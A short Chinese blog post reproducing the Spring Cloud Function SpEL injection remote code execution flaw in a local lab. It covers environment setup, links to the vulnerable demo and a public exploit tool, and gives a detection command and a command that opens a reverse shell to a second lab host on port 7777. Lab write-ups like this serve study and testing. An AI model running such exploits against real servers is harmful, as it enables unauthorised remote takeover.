【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现

# 环境搭建
JDK 15下载:
 
https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html

 

 

 

在CentOS7上安装JDK 15环境
 
rpm -ivh jdk-15.0.2_linux-x64_bin.rpm

 

 

 

漏洞环境下载:
 
https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

 

部署漏洞环境:
 
java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar

 

 

 

# 漏洞复现
访问:http://192.168.160.146:9000/

 

 

 
工具下载地址:
 
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

 

 
 开始检测漏洞并反弹shell
## 检测漏洞
python3 Spel_RCE_POC.py url.txt
## 反弹shell
python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777

 

 

 

 

 

posted @ 2022-03-29 18:22  流亡青年  阅读(346)  评论(0编辑  收藏  举报